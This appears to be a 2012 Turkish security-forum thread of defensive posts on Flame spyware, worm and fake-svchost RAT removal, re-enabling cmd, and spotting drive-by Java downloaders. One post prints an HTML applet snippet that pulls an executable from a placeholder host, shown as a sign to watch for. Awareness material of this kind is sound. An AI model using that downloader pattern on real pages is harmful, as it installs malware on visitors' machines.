Root     Cyber Navigation Organizasyon   Member Navigation
Forum Root Portal Root
Dökümanlar Döküman Ekle Download/Dosya Arsivi IBlock E-Kitap IBlock Mp-3 Basinda Cyber-Warrior Banner
Cyber-Academy
TIM Görev Organizasyonu Neler Yaptik? Bize Özel Küçük Seyler? Operasyon Yönetim Sistemi Görev Org. Basvuru Yönetici Basvuru Formu Karaliste Ihbar Organizasyon Semasi Misyon Kurallar
CW Explorer Kefalet Kefil Havuzu
Yeni Üye Basvuru Yazdigim Mesajlar Arkadas Listem Sifremi Unuttum Özel Mesajlarim Onay E-Mail Gönder




Bilgisayarınıza Giren Virüsler. Forumlarda Ara Arama Favorites Favorites MyProfile Forum üyelerini göster Üyeler
Forum Yöneticisi: SOLVER | Bu Bölümde Yetkili Tüm Yöneticiler?
 CW Forum Ana Sayfa
  Security
Light  |  Konu İhbar   Favori Konu Listeme Ekle  
Konu: Bilgisayarınıza Giren Virüsler. Cevap YazYeni konu açÇıkış Yap
 
 Konu Kalitesi  %15
Oy Ver   
 
Gönderilme Tarihi: 02 Eylül 2012 saat 1:02AM - Kayıtlı IP
İzle StifLer's Özellikler Diğer mesajlarını ara: StifLer
Mesaj İhbar!  
Alıntı  StifLer 

StifLer

Simgem
Teğmen
Teğmen
Bursa
03 Aralik 2011
162   Mesaj
Durum: vbphplinux !


Aktiflik
Seviye
Deneyim



Eğer Başlat > Çalıştır > Cmd Girdiğinizde
Komut İstemi, yöneticiniz tarafından devre dışı bırakılmış

Hatası alırsanız...


Başlat > Çalıştır > gpedit.msc yazıyoruz.


Kullanıcı Yapılandırılması’na tıklıyoruz ardından Yönetim Şablonları Ve Sistem



Sonra Komut Satırına Erişimi Engelle’ye çift tıklıyoruz ve işlemleri yapıyoruz.



Cmd Çalışıyor


Kolay Gelsin
Çözülmediyse veya başka sorununuz varsa bu başlık altından yazabilirsiniz.

  Yorum Ekle
  Özel Mesaj Gönder En Alta Git  En üste Git 
 
 
Gönderilme Tarihi: 02 Eylül 2012 saat 1:08AM - Kayıtlı IP
İzle StifLer's Özellikler Diğer mesajlarını ara: StifLer
Mesaj İhbar!  
Alıntı  StifLer 

StifLer

Simgem
Teğmen
Teğmen
Bursa
03 Aralik 2011
162   Mesaj
Durum: vbphplinux !


Aktiflik
Seviye
Deneyim



Flame Virüsü nün Detayları :
Flame Virüsünün Detayları,Tespiti Ve Temizlenmesi

Merhaba arkadaşlar. Bu yazımızda siber savaş araçlarından “Siber Casus” olarak nitelendirilen Flame virüsünü detayları ile birlikte inceleyeceğiz.


Silah savaşları gün geçtikçe yerini siber savaşlara bırakıyor. En son 2010 yılında Stuxnet virüsü ile İran nükleer santralleri hedef alındı. Yapılan incelemelerde virüsün 2009 yılında yazıldığı, 4 adet zero day (0 day) güvenlik zafiyeti barındırdığı ve virüsün flash diskler üzerinden yayıldığı tespit edilmiştir. 1 yıldan fazla sürede tespit edilemeden çalışmasına devam eden virüs, İran’a 800 milyon dolarlık zarar vermiştir.

Daha sonra Duqu virüsü ile Microsoft Word programındaki bir güvenlik zafiyeti kullanılarak, İran’daki nükleer santrallere ait bilgiler toplandı. Duqu ise mailler üzerinden yayılan bir zararlı yazılımdı.

Flame virüsü geçtiğimiz günlerde Rus güvenlik firması Kaspersky tarafından tespit edilmiştir. Stuxnet’e oranla 20 kat daha karmaşık bir mimariye sahip olduğu gözlenen siber casus, tahminlere göre 2010 Ağustos ayından bu yana aktif olarak çalışmaktadır.

Yapılan incelemelerde virüs başta İran, İsrail, Sudan, Suriye, Lübnan, Suudi Arabistan ve Mısır olmak üzere 600 den fazla kuruluş, akademik kurum ve devlet sistemi hedef almış durumdadır.

Makaleyi kaleme aldığım bugün dahi Flame virüsü tam olarak çözülememiştir. Kaspersky tarafından yapılan açıklamada virüsün şifrelerinin çözümlenmesi yılları bulacaktır. Ancak virüsün bazı modülleri şuan çözülmüş durumdadır. İran’ın Bilgisayar Acil Durum Tepki Ekibi (Maher)’nin yaptığı resmi açıklamaya göre virüsün 43 antivirüs uygulaması tarafından tespit edilemediği, ancak virüsün manuel yöntemler ile tespit edildiği ve virüsün en kısa sürede temizleneceği açıklaması yapıldı.

Güvenlik uzmanlarına göre, virüsün planlama ve programlamasının 5 yıl sürdüğü, iyi bir ekip tarafından hazırlandığı ve arkasında mutlaka bir devlet olduğu ileri sürülmektedir.



Flame neler yapıyor?

Flame, casusluk faaliyetlerini sürdürebilmek amacıyla, klavye, USB bağlantılar, işlemci, mikrofon, depolama aygıtları, Wi-Fi, monitör, Bluetooth gibi bir çok donanımı kullanabilecek kapasiteye sahiptir. Sızdığı bilgisayarlarda kendini belli etmemek için 5 ayrı şifreleme algoritması ile kendini kriptolayarak gizleyebilen Flame, casusluk işlemlerini arka planda yapabilmektedir.


Daha Fazlası Ve Flame Virüsünün Temizlenmesi İçin Daha önce açmış olduğum konuya bakabilirsiniz burayı kirletmiyorum Konu İçin TIKLA
  Yorum Ekle
  Özel Mesaj Gönder En Alta Git  En üste Git 
 
 
Gönderilme Tarihi: 02 Eylül 2012 saat 1:19AM - Kayıtlı IP
İzle StifLer's Özellikler Diğer mesajlarını ara: StifLer
Mesaj İhbar!  
Alıntı  StifLer 

StifLer

Simgem
Teğmen
Teğmen
Bursa
03 Aralik 2011
162   Mesaj
Durum: vbphplinux !


Aktiflik
Seviye
Deneyim



Worm.Win32.Otwycal.aq Virüsü
Bu virüsün özelliği explorer.exe ye bulaşır.
BU PROGRAM Veya
AVG ANTIVIRUS
Bunu rahatlıkla temizleyebilir.

Kolay Gelsin
Çözülmediyse veya başka sorununuz varsa bu başlık altından yazabilirsiniz.

  Yorum Ekle
  Özel Mesaj Gönder En Alta Git  En üste Git 
 
 
Gönderilme Tarihi: 02 Eylül 2012 saat 1:34AM - Kayıtlı IP
İzle StifLer's Özellikler Diğer mesajlarını ara: StifLer
Mesaj İhbar!  
Alıntı  StifLer 

StifLer

Simgem
Teğmen
Teğmen
Bursa
03 Aralik 2011
162   Mesaj
Durum: vbphplinux !


Aktiflik
Seviye
Deneyim



--Tehlikeli Sorgusuz Java Downloader--
Şimdide Belirteyim Bütün Dökümanlar Bana Aittir.

Öncelikle Bu Sorgusuz Java Downloader Genellikle Sosyal Mühendislik Yöntemidir.Tanımadığınız Kişiler Tarafından Mailinize Gelebilir,Herhangi bir sitede link olarak tıklanabilir.Veya Sosyal paylaşım sitelerinde size gönderilebilir.Tıkladığınız anda herhangi bir soru , uyarı , mesaj çıkmadan direk olarak bilgisayarınıza iner indiği anda açılıp açılmaması kalitesine bağlıdır.açıldığı anda bilgisayarınızda virüs aktif olur ve çalışmaya başlar.

Nasıl Korunabiliriz?
Google Chrome Kullanıyorsanız Gelen Linkin Başına view-source: koyarak yazın
ÖRN :
view-source:www.siteadi.com
böylece sayfanın kaynak kodlarını görmüş olacaksınız.İlla google chrome olmak zorunda değil sitenin kaynak kodlarını çeken programlar var.Eğer visual basic 6 için sitenin kaynak kodlarını çeken program yapmak isterseniz pm atın kodları söyliyeyim
Neyse
Eğer kodlar buna benzer veya bunun gibiyse...
Kesinlikle siteye tıklamayın aksi taktirde Sorgusuz Java downloader aktif olur ve bilgisayarınız tehlikeye girer.

<html><head>
<title></title>
</head>
<bOdy><applet code=’folder.peternova.class’ archive=’java.jar’><param name=’url’ value=’http://siteadi.com/server.exe’>
</applet>


Bunun gibi değilse siteye girebilirsiniz ama tek bir istisna var kodlar şifrelenmiş olabilir veya gizlenmiş olabilir Onuda google "Html Şifreleme" diye aratabilirsiniz.

Kolay Gelsin.
Çözülmediyse veya başka sorununuz varsa bu başlık altından yazabilirsiniz.

  Yorum Ekle
  Özel Mesaj Gönder En Alta Git  En üste Git 
 
 
Gönderilme Tarihi: 02 Eylül 2012 saat 10:06AM - Kayıtlı IP
İzle Antibiotic's Özellikler Diğer mesajlarını ara: Antibiotic
Mesaj İhbar!  
Alıntı  Antibiotic 

Antibiotic

Simgem
Binbaşı
Binbaşı
 
08 Temmuz 2012
360   Mesaj


Aktiflik
Seviye
Deneyim



Uzmanlık Alanları:
Malware Analysis

Eline sağlık uğraşmıssın hepsini ayrı ayrı msj yazmana gerek yok. Forumda konu açarken önizleme belli bir yere kadar kapsıyor bu seni yanıltmasın bütün yazılarını ekle açınca gözükür.

+7

___________________________________________
Kınamayınız, kınadığınız şey başınıza gelmedikçe ölmezsiniz. (Tirmizi)



  Yorum Ekle
  Özel Mesaj Gönder En Alta Git  En üste Git 
 
 
Gönderilme Tarihi: 02 Eylül 2012 saat 11:46AM - Kayıtlı IP
İzle StifLer's Özellikler Diğer mesajlarını ara: StifLer
Mesaj İhbar!  
Alıntı  StifLer 

StifLer

Simgem
Teğmen
Teğmen
Bursa
03 Aralik 2011
162   Mesaj
Durum: vbphplinux !


Aktiflik
Seviye
Deneyim



Quote: Orjinal mesajı yazan Antibiotic 02 Eylül 2012
Eline sağlık uğraşmıssın hepsini ayrı ayrı msj yazmana gerek yok. Forumda konu açarken önizleme belli bir yere kadar kapsıyor bu seni yanıltmasın bütün yazılarını ekle açınca gözükür.

+7



hmm böyle olduğunu bilmiyordum teşekkürler.
  Yorum Ekle
  Özel Mesaj Gönder En Alta Git  En üste Git 
 
 
Gönderilme Tarihi: 02 Eylül 2012 saat 1:41PM - Kayıtlı IP
İzle StifLer's Özellikler Diğer mesajlarını ara: StifLer
Mesaj İhbar!  
Alıntı  StifLer 

StifLer

Simgem
Teğmen
Teğmen
Bursa
03 Aralik 2011
162   Mesaj
Durum: vbphplinux !


Aktiflik
Seviye
Deneyim



Hazır bilgisayarıma svchost.exe virüsü girmişken onunda anlatımını yapayım..
Nasıl Temizlenir,svchost.exe nedir? ,Kim tarafından bulunmuştur..

Başlayalım.

svchost.exe Türk bir coder tarafından ticari , para kazanma amacıyla yazılmıştır.Ve her zaman kötü amaçlar,hedefler için kullanılmaktadır.Svchost.exe adı istenilirse değiştirilebilir;örnek : cw.exe gibi
svchost.exe RAT görevinde kullanılmaktadır.Yani kayıtlı şifreler svchost açıldıktan sonra girilen şifreler.Ekran görüntüleriniz belirli bir sistem ile karşı tarafa gönderilmektedir.

Şimdi svchost.exe her windows’ta var fakat virüs olduğunu nasıl anlayacağız

Eğer svchost veya (lar) resimdeki gibiyse sorun yok yani "SYSTEM" veya "NETWORK SERVICE" ise svchost size bulaşmamış demektir.


Eğer SYSTEM Veya NETWORK SERVICE Yerine Kullanıcı adınız yani oturum açma adınız,atıyorum Cw ise veya StifLer-PC,StifLerBilgisayar vs. Yani kullanıcı hesabına koyduğunuz isim yazıyorsa.Virüs bulaşmış demektir.[RESİMDEKİ GİBİ]


Nasıl Temizlenir?

XP’DE = C:\\Documents and Settings\\Kullanıcı Adınız\\Application Data içerisine svchost.exe, SCVHOST.exe, ntlog.sys, ntsys.dll olarak 4 dosya şeklinde bulaşır.CTRL+ALT+DELETE Basarak Görev Yöneticisini Açın svchost.exe karşısında kullanıcı adınız yazıyor ise işlemi hemen sonlandırın ve bütün şifrelenizi sonlandırdıktan sonra değiştirin.[Güvenlik Açısından]
//////////Regedit’ten Temizleme
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
Altında Run’a Girin

Eğer svchost "C:\\Documents and Settings\\ sizin otorum açma adınız \\Application Data\\svchost.exe" böyle bir değer varsa silin.
Sonra;
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon
Girin Ve Shell explorer.exe yerine
Shell explorer.exe "C:\\Documents and Settings\\Kullanıcı Adınız\\Application Data\\svchost.exe" diye birşey varsa
Shell , explorer.exe olarak değiştirin.

Eğer var ise bunlarıda siliniz:

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Shell NoRoam\\MUICache
C:\\Documents and Settings\\Kullanıcı Adınız\\Application Data\\SCVHOST.EXE SCVHOST

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Shell NoRoam\\MUICache
C:\\Documents and Settings\\Kullanıcı Adınız\\Application Data\\svchost.exe svchost

VISTA’DA = C:\\Users\\Kullanıcı Adınız\\AppData\\Roaming içerisine svchost.exe, SCVHOST.exe, ntlog.sys, ntsys.dll olarak 4 dosya şeklinde bulaşır.
VISTA DA TEMIZLEMEK :

1. Başlat , Denetim Masası, Görünüm ve Kişiselleştirme ve ardından Klasör Seçenekleri’ni tıklatarak Klasör Seçenekleri’ni açın.
2. Görünüm sekmesini tıklatın.
3. Gelişmiş ayarlar altından Gizli dosya ve klasörleri göster’i ve ardından Tamam’ı tıklatın.
CTRL+ALT+DELETE yaparak görev yöneticisini açın.

svchost.exe nin karşısında yani kullanıcı adı kısmında oturum açma adınız yazıyorsa o svchost.exe işlemini sonlandırın

C:\\Users\\Kullanıcı Adınız\\AppData\\Roaming klasörünü açıp svchost.exe, ntlog.sys, ntsys.dll, SCVHOS.exe dosyalarını silin
Regedit ’ ten temizleme :
Başlat>Çalıştır>Regedit
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
svchost "C:\\Users\\Kullanıcı Adınız\\AppData\\Roaming\\svchost.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon
Girin Ve Shell explorer.exe yerine
Shell explorer.exe "C:\\Documents and Settings\\Kullanıcı Adınız\\Application Data\\svchost.exe" diye birşey varsa
Shell , explorer.exe olarak değiştirin.
Eğer var ise bunlarıda siliniz:

HKEY_CLASSES_ROOT\\Local Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache
C:\\Users\\Kullanıcı Adınız\\AppData\\Roaming\\SCVHOST.EXE SCVHOST

HKEY_CLASSES_ROOT\\Local Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache
C:\\Users\\Kullanıcı Adınız\\AppData\\Roaming\\svchost.exe svchost



Bunları yaptıktan sonra; Kontrol etmek için Kayıt defteri düzenleyicisin den önce SCVHOST:EXE yi aratın daha sonra Roaming\\svchost.exe ’yi aratın eğer bu kelimeler bulunuyorsa ilgili girdileri silin bulunmuyorsa keylogger temizlenmiş demektir.






WINDOWS 7’ de = C:\\Users\\Kullanıcı Adınız\\AppData\\Roaming içerisine svchost.exe, SCVHOST.exe, ntlog.sys, ntsys.dll olarak 4 dosya şeklinde bulaşır.

WINDOWS 7’ DE Temizlemek :

Gizli dosya ve klasörler seçeneğini aktif hale getirin
Gizli dosyaları ve klasörleri görüntülemek için aşağıdaki adımları izleyin.
1. Başlat, Denetim Masası, Görünüm ve Kişiselleştirme ve ardından Klasör Seçenekleri’ni tıklatarak Klasör Seçenekleri’ni açın.
2. Görünüm sekmesini tıklatın.
3. Gelişmiş ayarlar altından Gizli dosya ve klasörleri göster’i ve ardından Tamam’ı tıklatın.
CTRL+ALT+DEL basarak görev yöneticisini açın

svchost.exe nin karşısında yani kullanıcı adı kısmında oturum açma adınız yazıyorsa o svchost.exe işlemini sonlandırın

C:\\Users\\Kullanıcı Adınız\\AppData\\Roaming klasörünü açıp svchost.exe, ntlog.sys, ntsys.dll, SCVHOS.exe dosyalarını silin
WINDOWS 7’ REGEDITTEN TEMIZLEME
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
Bunu bulup silin
svchost "C:\\Users\\Kullanıcı Adınız\\AppData\\Roaming\\svchost.exe"


HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon

Bu değeri
Shell explorer.exe "C:\\Users\\sizin otorum açma adınız\\AppData\\Roaming\\svchost.exe"

Bu şekil değiştirin
Shell explorer.exe

Ve son olarak bilgisayarınızı yeniden başlatın;svchost.exe virüsü sorunsuz olarak temizlenmiştir.

Not: Gizli dosya ve klasörler seçeneğini aktif hale getirmeden belirtilen dizini göremezsiniz.

Kolay Gelsin.
Çözülmediyse veya başka sorununuz varsa bu başlık altından yazabilirsiniz.
  Yorum Ekle
  Özel Mesaj Gönder En Alta Git  En üste Git 
 
<<
2
 

Eğer bu konuya cevap yazmak istiyorsanız ilk önce Giriş Yap
Eğer kayıtlı bir kullanıcı değilseniz ilk önce kayıt olmalısınız

Git: Cevap Yaz Yeni konu aç
Sayfa Yüklenme Süresi: 0,0938
 

Uyarı !
Cyber-Warrior 'a ait isim, marka ve logolar Cyber-Warrior'un tescilli markası olup izinsiz kullanılamaz.
Kullananlar hakkında 556 Sayılı Markaların Korunması Hakkında K.H.K'ye göre yasal işlem yapılacaktır. Marka No : 2010 46588 Korunma Tarihi : 15.07.2010


WikiTurk | Bilisim Güvenligi Dernegi

Reklamlar

picardes.com





Reklam vermek için tıklayın

Yasal Uyarı | Sitemizin Çizgisi | Kullanım Şartları ve Üyelik Sözleşmesi | Telif Hakları Politikası / Copyright Policy